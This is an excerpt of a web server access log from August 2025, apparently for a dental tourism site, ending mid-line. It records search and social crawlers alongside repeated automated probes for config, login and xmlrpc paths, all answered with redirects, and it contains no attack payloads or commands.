173.252.83.4 - - [12/Aug/2025:03:06:34 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 206.189.247.132 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 216.73.216.186 - - [12/Aug/2025:03:09:55 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 206.189.247.132 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 216.73.216.186 - - [12/Aug/2025:03:10:41 -0400] "GET /main HTTP/1.1" 301 235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:03:10:41 -0400] "GET /wp-admin HTTP/1.1" 301 239 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 108.174.2.217 - - [12/Aug/2025:03:11:28 -0400] "GET / HTTP/1.1" 301 231 "-" "LinkedInBot/1.0 (compatible; Mozilla/5.0; Apache-HttpClient +http://www.linkedin.com)" 149.102.237.41 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 216.73.216.186 - - [12/Aug/2025:03:13:49 -0400] "GET /.well-known/acme-challenge/EUU7UFICLG5Y863AOZBVB518R9S4P22X HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:03:13:54 -0400] "GET /.well-known/acme-challenge/5O-CEHQUKH0M-8I0UAOR8O49P07GC91K HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 50.31.235.131 - - [12/Aug/2025:03:14:10 -0400] "HEAD /Config/net HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 66.220.149.112 - - [12/Aug/2025:03:16:44 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 209.38.125.40 - - [12/Aug/2025:03:24:23 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:03:24:24 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:03:24:24 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:03:24:24 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 68.183.245.101 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 4.43.184.114 - - [12/Aug/2025:03:30:16 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 86.8.204.43 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:03:42:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:03:42:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:03:42:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:03:42:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 51.68.111.219 - - [12/Aug/2025:03:44:34 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)" 51.68.111.219 - - [12/Aug/2025:03:44:35 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)" 209.38.125.40 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 68.183.245.101 - - [12/Aug/2025:03:56:07 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:03:56:07 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:03:56:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:03:56:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 66.249.74.14 - - [12/Aug/2025:04:01:37 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 206.189.247.132 - - [12/Aug/2025:04:10:31 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:04:10:31 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:04:10:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:04:10:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 91.191.209.102 - - [12/Aug/2025:04:23:03 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0" 209.38.125.40 - - [12/Aug/2025:04:24:04 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:04:24:05 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:04:24:05 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:04:24:05 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 156.228.117.67 - - [12/Aug/2025:04:24:17 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0" 156.253.164.19 - - [12/Aug/2025:04:24:55 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 68.183.245.101 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.228.93.143 - - [12/Aug/2025:04:25:36 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 156.253.175.245 - - [12/Aug/2025:04:26:12 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 149.102.237.41 - - [12/Aug/2025:04:26:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:04:26:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:04:26:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:04:26:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 91.191.209.102 - - [12/Aug/2025:04:26:55 -0400] "GET /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0" 216.73.216.186 - - [12/Aug/2025:04:28:26 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:04:28:27 